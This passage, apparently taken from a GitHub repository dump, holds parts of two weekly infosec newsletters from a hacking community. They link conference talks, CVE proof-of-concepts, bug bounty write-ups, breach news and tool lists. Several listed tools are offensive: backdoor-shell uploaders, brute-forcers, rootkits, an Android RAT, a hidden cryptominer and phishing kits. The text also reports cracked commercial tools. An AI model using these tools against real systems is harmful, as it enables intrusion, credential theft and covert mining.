machine](https://twitter.com/podalirius_/status/1565001716080189442)\n\n\n- **Leaks & BlackHat Hacker: Source Unknown**\n \n - 🔴 TikTok Breach is Confirmed my multiple reseseachers and rsources. Few researcher claims that over 1 billion users as well as payment info has been compromised.\n\n - 🔴 India's newest commercial airline, \"Akasa Air,\" has had its customers' personal data exposed, which the company attributes to a technical configuration error.\n \n - 🔴 Advance Infrastructure Hacking Workshop By NotSoSecure from BLACKHAT 2022 event has been leaked.(Unknown Source)\n \n - 🔴 Paid Tools that has been cracked by Black Hat Hackers : CANVAS 7.27, Invicti Standard 6.7.0.37625, Malcat malware analyzer, BurpSuite_pro_v2022_8.3 xray_1.9.1_windows_x64 and 010 Editor 13.0-beta2 .\n\n - **Top 5 Infosec News:** \n\n - 🟢 On 25th August 2022, Google announced that it is planning to launch an online cyber security training program for upgrading the skills of the employees who are working in the cyber security departments worldwide. It also announced a grant of USD 2 Million for non-profit companies to develop various cyber-safety tools for protection against several forms of cyber-attacks worldwide.\n\n - 🟢 On 24th May 2022, IBM Corp. announced that it is planning to provide a grant of USD 5 million for the improvement of cyber security resiliency in schools all over the world. Also, it announced that the sponsor teams of IBM would help the schools to be prepared proactively against malicious cyber-attacks. This program is gradually gaining popularity across the countries like UAE, Ireland, Costa Rica, Brazil, etc.\n\n - [🟢 United States ???? Here is the user manual for a mass surveillance tool that U.S. local cops are actively using.](https://www.vice.com/en/article/v7v34a/fog-reveal-local-cops-phone-location-data-manual) U.S. Department of State Concludes Settlements of Alleged Export Violations by Ryan Adams, Marc Baier, and Daniel Gericke - three former NSA analysts who worked for the UAE providing exploits used for cyber surveillance.\n\n - [🟢 U.S. Department of State Concludes Settlements of Alleged Export Violations by Ryan Adams, Marc Baier, and Daniel Gericke ](https://www.state.gov/u-s-department-of-state-concludes-settlements-of-alleged-export-violations-by-ryan-adams-marc-baier-and-daniel-gericke/) Three former NSA analysts who worked for the UAE providing exploits used for cyber surveillance\n\n - [🟢 Hackers hide malware in James Webb telescope images](https://www.bleepingcomputer.com/news/security/hackers-hide-malware-in-james-webb-telescope-images/)\n \n---\n\n### 📆📆🏛️🏛️🏛️ HIRING, COURSE & TRAINNING. 📆📆📆🏛️🏛️🏛️\n\n\n**HIRING, COURSE & TRAINNING - Here we talk about and share resources related to Jobs, Ongoing Workshop and free trainning offered by organization, community and leader.**\n\n1. Take a Look at [Internship/Job Opening in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here We have collected [Interview Questions asked by organization while Hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n3. Enrolment is open for [(FREE (ISC)² Certified in Cybersecurity?](https://www.isc2.org/landing/1MCC?utm_source=isc2list&utm_medium=official-communication&utm_campaign=GBL-CC-1M-AW&utm_content=awareness) Courses and Exams. The course is free, the candidate due is free until September 2023, then it will be $50, the exam will be charged 50$.\n\n4. A Smart Contract Auditor Shows How They [Hack Smart Contracts](https://youtu.be/xD0IZh9c8LM)\n5. Learn Memory Forensics through [CTF-styled labs - LMemLabs](https://github.com/stuxnet999/MemLabs)\n \n---\n \n--- \n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\n*Community members test the tools and we filter out most demanding and helpful tools that satisfy the hacker Purpose.*\n\n - **1. SAAS/PASS/Recon/Network/Web Pentesting** - 6\n \n - [DongTai IAST is an open-source passive interactive security testing (IAST) product.](https://github.com/HXSecurity/DongTai) -> It uses dynamic hooks and taint tracking algorithms to achieve universal vulnerability detection and multiples request associated with vulnerability detection (including but not limited to unauthorized vulnerabilities, overpower vulnerabilities), Third-party component vulnerability detection, etc. Currently, applications in Java and Python are supported for vulnerability detection.\n \n - [Hunt3r ](https://github.com/EasyRecon/Hunt3r) - Made your bugbounty subdomains reconnaissance easier with Hunt3r the web application reconnaissance framework.\n \n - [lfimap](https://github.com/hansmach1ne/lfimap) - A local file inclusion discovery and exploitation tool. \n \n - [Probe](https://github.com/whoami-anoint/Probe) -> This is a special tool for bug hunter for automated recon process smoothly.\n \n - [BlackWidow](https://github.com/CoolerVoid/Vision2) - A python based web application spider to gather subdomains, URL's, dynamic parameters, email addresses and phone numbers from a target website. This project also includes Inject-X fuzzer to scan dynamic URL's for common OWASP vulnerabilities.\n \n - [pip-audit](https://github.com/pypa/pip-audit) -> programer use this tool for scanning Python environments for packages with known vulnerabilities. It uses the Python Packaging Advisory Database (https://github.com/pypa/advisory-database) via the PyPI JSON API (https://warehouse.pypa.io/api-reference/json.html) as a source of vulnerability reports.\nThis project is maintained in part by Trail of Bits with support from Google. This is not an official Google or Trail of Bits product\n \n - [Wpushell](https://github.com/22XploiterCrew-Team/Wpushell) -> A tool used to upload a backdoor shell to a site that uses a WordPress Content Management System with a simple, fast process and Execution of more than one target.. Built using the Python programming language and can only be run on the command line terminal.\n \n \n - **2. Cloud Security** - 1\n \n - [CloudQuery](https://github.com/cloudquery/cloudquery) -> The open source high performance data integration platform designed for security and infrastructure teams. CloudQuery extracts, transforms, and loads your cloud assets. CloudQuery enables you to assess, audit, and nitor the configurations of your cloud assets.\n \n - **3. Blue/Red Team, IR and Threat intelligence Tools** - 4\n \n - [RossGeerlings/tio-ad-sync](https://github.com/RossGeerlings/tio-ad-sync) Group Syncing between Active Directory and Tenable.io, and Automated Access Control.\n \n - [Shreder - A powerful multi-threaded SSH protocol password brute-force tool](https://github.com/EntySec/Shreder). -> It has gain his popularity from community for the feature such as Very fast password guessing, just one password in 0.1 second, Optimized for big password lists, Shreder tries 1000 passwords in 1 minute and 40 seconds, Simple CLI and API usage.\n \n - [GarbageMan - A set of tools designed for .NET heap analysis. These tools offer the following benefits for malware researchers](https://github.com/WithSecureLabs/GarbageMan) .\n -> *Features* that makes it special : Ability to extract clear-text payload (PE Images etc.) from .NET heaps quickly, Easy analysis of encrypted network protocols, signs of data exfiltration, and Ability to overcome malware anti-dumping techniques (psnotify).\n\n - [MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce) -> Coerced Authentication - A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.\n \n - [r77 Rootkit](https://github.com/bytecode77/r77-rootkit) -> A ring 3 Rootkit that hides following entities from all processes: Files, directories, junctions, named pipes, scheduled tasks (Processes, CPU usage, Registry keys & values, Services, TCP & UDP connections\n \n - **4. OSINT Tools** - 3\n \n - [The_spy_job](https://github.com/XDeadHackerX/The_spy_job) -> This Tool is focused on the OSINT of almost all areas (People, Nicknames, Social Networks, Emails, Phone Numbers, Websites, Public IPs and Images). \n \n - [SentryPeer(fraud detection tool) - Protect your SIP Servers from bad actors](https://github.com/SentryPeer/SentryPeer) -> It lets bad actors try to make phone calls and saves the IP address they came from and number they tried to call. Those details can then be used to raise notifications at the service providers network and the next time a user/customer tries to call a collected number, you can act anyway you see fit.\n \n - [fake-sms](https://github.com/machine1337/fake-sms) -> Feature that make this tools interesting include sms anonymously, easy & super fast sms sending, international sms sending available, no charges on sending sms but we have 1 limitation as well you can send only one sms per day. \n \n - **5. IoT, OS & Hardware** - 4\n \n - [Reinschauer](https://github.com/ps1337/reinschauer) -> A PoC to remotely control *Windows machines* over Websockets.\n\n - [SandboxBootkit](https://github.com/thesecretclub/SandboxBootkit) -> Bootkit tested on Windows Sandbox (https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-sandbox/windows-sandbox-overview) to patch ntoskrnl.exe and disable DSE/PatchGuard.\n\n - [GetWindowsCredentials](https://github.com/Rvn0xsy/GetWindowsCredentials) -> Get user credentials by calling the Windows API [CredUIPromptForWindowsCredentialsW](https://github.com/Rvn0xsy/GetWindowsCredentials/blob/master/CredUIPromptForWindowsCredentialsW) and save them to a file.]\n \n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n---\n \n### 🤝🤝🤝 How to get involve in Contribution. #Contact-Us 🤝🤝🤝\n\n

\n \n
\n\n If you quickly want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n \n Please write a reason, How do you plan to improve it?\n \n### I'm so grateful to all the [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) without their Writeups, article, findings and whitepaper [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n### I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support reaching \"Weekly InfoSec Update\" to hacker would not have been possible.\n\n### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n\n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n\n Thanks for reading!\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md", "content": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote Of Week is \"Don't rush the Process. Good Things Take Time.\"\n Here are the Agenda for *Weekly infosec Update v0.4* : **7th September - 13th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n**Tips to SAVE TIME & How to READ ?**\n- Select the topic from the *Navbar* bellow and click on **Priview** to see the Details:\n- Goto the topic > Open all relevent Title in New Tab then READ it one by one.\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n![WIUv0 4](https://user-images.githubusercontent.com/25515871/189512256-bb51318d-3d0a-41a6-b3b9-a69cd98c2f2a.png)\n\nHuge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\n
\nPriview\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n
\n \n---\n\n### Let's start with the EVENT recap, and my apology for So much Info. We're finding a way to make it organized and user friendly.\n\n### 🎫🎫🎫 EVENT recap 🎫🎫🎫\n \nThis Week Nullcon Goa 2022 (india), Ruxmon 2022 and Defcon talks was mainly trending in infosec community so We have collected public available important Talk, Slides, Tools, Weekly Podcast, Youtube Videos and resources releted to Events, Talks & Webinars.\n\n
\nPriview\n \n - NULLCON GOA SEP 2022\n - [Raining CVEs on WordPress Plugin via Semgrep](https://shreyapohekar.com/blogs/raining-cves-on-wordpress-plugin-via-semgrep-nullcon-goa-2022-slide-deck/)\n - [Alexander Popov slide - A Kernel Hacker Meets Fuchsia OS](https://a13xp0p0v.github.io/img/Alexander_Popov-Fuchsia_pwn.pdf) \n - [s1r1us talk Electrovolt Pwning Popular Desktop Apps](https://speakerdeck.com/s1r1us/electrovolt-pwning-popular-desktop-apps-while-uncovering-new-attack-surface-on-electron?slide=2)\n - [Talk summary by @ka3h and @covertly_overt on Handeling bug bounty program](https://mobile.twitter.com/RazorpayEngg/status/1568181923704610817)\n\n- Mustafa Ankin released An honest recap of [fwd:cloudsec and AWS re:Inforce 2022](https://www.resmo.com/blog/recap-of-fwdcloudsec-and-aws-reinforce)\n\n- Ruxmon 2022 talk by PentesterLab’s Louis Nyffenegger covering [how SAML works and various attacks, including XXE, XML signature shenanigans, malicious identity providers, etc.](https://docs.google.com/presentation/d/1ngp3Mq8y2h2xwGKqkOhI1ePUQxvXTNO1Xhs1kaBJmqU/edit#slide=id.g14623ab8ca8_0_31)\n\n- In SF22US, Gerald Combs and Loris Degioanni introduced there project called [Logray | The Future of Packet Analysis](https://www.youtube.com/watch?v=7bfUSXJPHPs) \n\n- Some beleive that Hacker are more than using computer to manupulating victim computer. this video uncovering the government agencies that secretly tested [Brain Enhancement Techniques Listed In a CIA Document](https://youtu.be/zMK8bPEerEM): The report entitled Analysis and Assessment of The Gateway Process was penned in 1983 by US Army Lieutenant Colonel Wayne M McDonnell.\n \n- Upcomming/Ongoing 𝙀𝙑𝙀𝙉𝙏𝙎: *LogRhythm RhythmWorld 2022* - Denver - 13th-15th September, THREAT CON 2022- 13th-15st September, *SSP Alert Live Washington DC*- 19th-21st September, BSides Singapore Conference 2022 22nd-23rd September.\n\n
\n \n---\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [07th September - 13th Sepetember 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\nThere are tens of thousands of vulnerabilities disclosed each Week. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [CVE poc and analysise the CVE writeups that have Higher Severity.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) Click on link to see all the mentioned poc, analysis and exploits.\n\n
\nPriview\n\n CVE POC exploit (9+): CVE-2022-22629 MacOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-128, \n CVE-2022-20360, CVE-2022-37299, CVE-2022-25260, Chaining CVE-2021-42278 and CVE-2021-42287.\n \n CVE Analysis : Latest IT security vulnerability patched on selected company such as Apple, Google, Microsoft, \n Github, Linux(Ubuntu, kali etc), D-Link etc. , CVE-2022-34169 & CVE-2022-31474 Wordpress. \n \n Exploit : Mobile Mouse 3.6.0.4 Remote Code Execution, \n\n Note - If you don't play with CVE then please skip this Section.\n
\n\n\n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\nHere We have 2 segments, \n1. Hackerone/Bugcrowd reports for Bug Hunters.\n2. Bug bounty writeups, tips & resources.\n\n
\nPriview\n \n *1. In This Segment, We have filtered out **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n \n \n - 🐞$33,510 - for Command Injection - Generic on Gitlab. @vakzz was able to execute [RCE via the DecompressedArchiveSizeValidator and Project BulkImports (behind feature flag)](https://hackerone.com/reports/1609965)\n - 🐞$1,700 : @nokline and @bombon was able [poison the cache of thousands of pages in Glassdoor with reflected & stored XSS](https://nokline.github.io/bugbounty/2022/09/02/Glassdoor-Cache-Poisoning.html)\n - 🐞$1,500 - DDOS on Hyperledger, Mirko Mollik(Cre8) was able to [max out the validator nodes of blockchain and that lead to block external connections or you can ](https://hackerone.com/reports/1695472)\n\n *2. In This Segment We Collected and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n - 🐞Adam Bannister highlighted the [latest bug bounty programs for September 2022.](https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-september-2022)\n - 🐞Mahmoud Youssef managed to get a [P1 through Out-of-band XXE](https://0xmahmoudjo0.medium.com/exploiting-out-of-band-xxe-in-the-wild-16fc6dad9ee2) which leads to reading all files contents even large ones,\n - 🐞S Rahul shared his [Reconnaissance approch and How he found an SSRF](https://systemweakness.com/bug-bounty-how-i-found-an-ssrf-reconnaissance-7b1821a1b1fd)\n - 🐞@abbasheybati1 shared a [New technique 403 bypass lyncdiscover.microsoft.com](https://medium.com/@abbasheybati1/403-bypass-lyncdiscover-microsoft-com-db2778458c33)\n - 🐞In Google Chat Spaces, bug hunter observe that creator automatically becomes the Space Manager and this happen [due to the IDOR vulnerability, bug hunter was able to removing members from any Google Chat Space](https://hopesamples.blogspot.com/2022/09/idor-leads-to-removing-members-from-any.html)\n - 🐞In this article, Gareth Heyes shared [7 ways to call a JavaScript function without parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)\n\n
\n \n---\n \n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n This is one of our best Segment for Researcher, founder, organization and want to explore Security, looking for a new approach to find vulnerabilty and keep track of Infosec market. Beginner bug Hunter or junior pentester can skip this Section or you can checkout the Web Security.\n\n
\nPriview\n \n - **1 - Web Security and android security**\n\n - [How a Script Kiddie and 25 Lines of Python Could Theoretically Devastate America’s Gas Stations](https://medium.com/@RoseSecurity/a-theoretically-devastating-cyber-attack-on-americas-gas-stations-ff1d9bbaf1) \n - Penetration Testing REST APIs Using Burp Suite: Part 1 – [Introduction & Configuration](https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration)\n - Sonar researchers explained how they were able to exploit a vulnerability[(blind server-side request forgery (SSRF)) in the pingback requests feature within WordPress that could enable distributed denial-of-service (DDoS) attacks.](https://portswigger.net/daily-swig/six-year-old-blind-ssrf-vulnerability-in-wordpress-core-feature-could-enable-ddos-attacks)\n - Adam Bannister talked about WordPress project [WPHash - harvests 75 million hashes for detecting vulnerable plugins](https://portswigger.net/daily-swig/wordpress-project-wphash-harvests-75-million-hashes-for-detecting-vulnerable-plugins)\n - [A bug that was 23 years old or not](https://daniel.haxx.se/blog/2022/09/05/a-bug-that-was-23-years-old-or-not/)\n - The Google Security Blog - [Fuzzing beyond memory corruption: Finding broader classes of vulnerabilities automatically.](https://security.googleblog.com/2022/09/fuzzing-beyond-memory-corruption.html)\n - An interactive cybersecurity curriculum designed for enterprise use at software companies using [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding)\n\n \n - **2 - Cloud Security**\n - [Automating cloud & SaaS Security for SREs](https://automatingcloudsec.substack.com/p/cloud-demands-cloud-native-security)\n - [SREs and DevOps Teams are the defenders of the digital world ](https://automatingcloudsec.substack.com/p/sres-and-devops-teams-deserve-better) \n - [Incident response in AWS CloudTrail](https://www.chrisfarris.com/post/aws-ir/)\n - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n - [Azure Active Directory Pass-Through Authentication Flaws](https://www.secureworks.com/research/azure-active-directory-pass-through-authentication-flaws) -> In this article Secureworks® Counter Threat Unit™ (CTU) researchers analyzed how the protocols used by PTA(Pass-through authentication) could be exploited. \n \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n - **Blue Team**\n - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n - The DFIR Report - [Dead or Alive? An Emotet Story](https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/)\n - TA453 Uses [Multi-Persona Impersonation(a social engineering impersonation technique informally) to Capitalize on FOMO](https://www.proofpoint.com/us/blog/threat-insight/ta453-uses-multi-persona-impersonation-capitalize-fomo) Here threat actor uses at least two actor-controlled personas on a single email thread to convince targets of the legitimacy of the campaign. \n - Cybersecurity and Energy : [The Case Study of Stuxnet](https://dione.lib.unipi.gr/xmlui/bitstream/handle/unipi/14572/Zampati_men20011.pdf?sequence=1)\n - Microsoft [investigates Iranian attacks against the Albanian government](https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/)\n\n \n - **Red Team**\n - DEF CON 30 - [\"Avoiding Memory Scanners: Customizing Malware to Evade YARA, PE-sieve, and More\"](https://blog.kyleavery.com/posts/avoiding-memory-scanners/) which included the public release of a new tool called AceLdr.\n - DEFCON-30 [JMA : Exotic Data Exfiltration talk](https://github.com/sourcefrenchy/DEFCON-30---Exotic-Data-Exfiltration)\n - [Part 1 :- Shellcode Injection Techniques in C#](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/) In this blog post @AhmedSher have discussed about Process Injection in C#.\n - [Part 2 :- Shellcode Injection Techniques. Process Hollowing in C#.](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-2/)\n - [Hijacking DLLs in Windows](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows) -> DLL Hijacking is a popular technique for executing malicious payloads. This post lists nearly 300 executables vulnerable to relative path DLL Hijacking on Windows 10 (1909), and shows how with a few lines of VBScript some of the DLL hijacks can be executed with elevated privileges, bypassing UAC.\n\n - **4 - Infosec Business, funded and Market** \n\n - Netflix’s former InfoSec leader Jason Chan offers early stage founders six \"green flags\" to look out for [when hiring and building cybersecurity teams that truly make an impact.](https://www.bvp.com/atlas/how-to-hire-and-build-your-cybersecurity-team)\n - Darkreading has wrote an summery for [MarketsandMarkets(TM) Report](https://www.darkreading.com/vulnerabilities-threats/penetration-testing-market-worth-2-7b-by-2027-marketsandmarkets-tm-report) that highlight Penetration Testing Market Worth $2.7B By 2027 and more.\n - The Security, Funded newsletter issue #60 by Return on Security shared the Funding Summary Where he mentioned\n 14 companies raised $419.2M across 12 unique product categories.\n 7 companies were acquired or had a merger event across 3 unique product categories for $1.8M.\n\n
\n\n---\n \n\n### 📰📰📰 NEWS 📰📰📰\n\nHere we have 3 Segments,\n\n1. Twiter Threads & Tips.\n2. Data Breach & BlackHat Hackers.\n3. Top 5 Infosec News.\n \n
\nPriview\n \n- **TWITTER THREAD & TIPS**\n\n - 🟢 [Johan Carlsson shared a thread on [how to get started or where and what to look for for Bug on GitLabs](https://twitter.com/joaxcar/status/1567617283215720449?t=YUms7BQi4rDuIlvNFXHqGQ&s=19)\n - 🟢 [MSSQL Coercer: Coerce a Windows SQL Server to authenticate on an arbitrary machine](https://twitter.com/podalirius_/status/1565001716080189442)\n - 🟢 BertJanCyber shared a Thread about [encoded PowerShell commands and how to hunt for suspicious powershell](https://twitter.com/BertJanCyber/status/1567816841644412939?t=-nvdnWTNOLtvODjtMlqo8A&s=19)\n \n- **Leaks & BlackHat Hacker: Source Unknown**\n \n - 🔴 **News - Paid Tools** that has been leaked or cracked by Black Hat Hackers : Cobaltstrike 4.7 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, Malcat malware analyzer, BurpSuite_pro_v2022_9,Acunetix Version 14 build 14.9.220713150 for Windows & Linux, xray_1.9.1_windows_x64 and 010 Editor 13.0-beta2.\n \n - 🔴 [Shiba Inu developers leak AWS Access keys on a public code repository, resulting in a compromise of their infrastructure.](https://blog.pingsafe.com/shiba-inu-cloud-credentials-leaked-in-a-major-security-breach-394ad54382c1)\n \n - **Top 5 Infosec News:** \n\n - 🟢 **Announcement** : S0md3v released 2.1.6 of s0md3v/Arjun.\n - 🟢 On 24th May 2022, IBM Corp. announced that it is planning to provide a grant of USD 5 million for the improvement of cyber security resiliency in schools all over the world. Also, it announced that the sponsor teams of IBM would help the schools to be prepared proactively against malicious cyber-attacks. This program is gradually gaining popularity across the countries like UAE, Ireland, Costa Rica, Brazil, etc.\n - 🟢 TikTok still denies security breach after hackers leak user data, source code. \n - 🟢 Classified NATO documents stolen from Portugal, now sold on darkweb.\n - 🟢 Hackers hide [malware in James Webb telescope images](https://www.bleepingcomputer.com/news/security/hackers-hide-malware-in-james-webb-telescope-images/)\n\n
\n \n---\n \n\n### 🕴️🕴️🕴️ HIRING, COURSE & TRAINNING. 🕴️🕴️🕴️\n \nHere we talk about and share latest resources related to Jobs, Workshop and free trainning offered by organization, community and leader.\n\n
\n Priview\n \n1. Take a Look at [Internship/Job Opening in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here We have collected [Interview Questions asked by organization while Hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n
\n \n---\n\n \n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\nCommunity members test the tools and we filter out most demanding and helpful tools that satisfy the hacker Purpose.\n\n
\nPriview\n \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 6\n \n - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n\n - [xsser](https://github.com/epsylon/xsser) -> Cross Site \"Scripter\" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs.\n\n - [Darc - Darkweb Crawler Project.](https://github.com/JarryShaw/darc) -> darc is designed as a swiss army knife for darkweb crawling. It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. It also bundles selenium to provide a fully rendered web page and screenshot of such view.\n\n - [Vulnerable Web App - sqli-postgres-rce-privesc-hacking-playground](https://github.com/filipkarc/sqli-postgres-rce-privesc-hacking-playground)\n \n - [Chameleon](https://github.com/iustin24/chameleon) -> Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies. This tool is highly customizable and allows users to add in their own custom wordlits, extensions or fingerprints. The [full documentation is available on](https://youst.in/posts/context-aware-conent-discovery-with-chameleon/)\n \n - [vMass Bot](https://github.com/c99tn/vMass) -> vMass Bot automates the exploitation of remote hosts by trying to find environment files (.env) in target hosts and extract tools and info insde, then the bot detects the target host CMS and tries to auto exploit and upload shell payload using the vMass vulnerability set ( 108 exploits in the current version 1.2).\n \n \n - **2. Cloud Security** - 2\n \n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n - [ContainerSSH](https://github.com/ContainerSSH/ContainerSSH) -> An SSH Server that Launches Containers in Kubernetes and Docker\n \n - **3. Blue/Red Team, IR and Threat intelligence Tools** - 5\n \n - [Massayo](https://github.com/thiagopeixoto/massayo) is a small proof-of-concept Rust library which removes AV/EDR hooks in a given system DLL.\n - [Redeye](https://t.me/hackgit)https://github.com/redeye-framework/Redeye) -> It covers all aspects of red team engagement Whether it is to organize all sort of data, create a timeline of the engagement and much more!.\n - [Autobloody](https://github.com/CravateRouge/autobloody) - Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.\n - [WmiSpawn](https://github.com/daem0nc0re/TangledWinExec/tree/main/WmiSpawn) -> This is a PoC to invesitgate WMI process execution technique. Using WMI functionallity, we can spawn any process as a child process of WmiPrvSE.exe. This tool supports not only local machine's process execution but also remote machine's process execution.\n - [Evilgophish - Combination of evilginx2 and GoPhish.](https://github.com/fin3ss3g0d/evilgophish)\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n - [Android RAT](https://github.com/Th30neAnd0nly/Ohm) -> RAT built in Android APP for Android User.\n \n - **4. OSINT Tools** - 3\n \n - [Obsidian Ancestry Investigations ](https://github.com/C3n7ral051nt4g3ncy/Obsidian)\n - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks. \n - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once. \n \n - **5. IoT, OS & Hardware** - 4\n \n - [SilentCryptoMiner](https://github.com/UnamSanctam/SilentCryptoMiner) -> A free silent (hidden) native cryptocurrency miner capable of mining ETH, ETC, XMR, RTM and much more, with many features suited for mining silently.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [WES-NG - Windows Exploit Suggester - Next Generation.](https://blog.bitsadmin.com/blog/windows-security-updates-for-hackers)https://github.com/bitsadmin/wesng) - tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 11, including their Windows Server counterparts, At the BITSADMIN blog an in-depth article on WES-NG is available: [Windows Security Updates for Hackers.](https://blog.bitsadmin.com/blog/windows-security-updates-for-hackers)\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
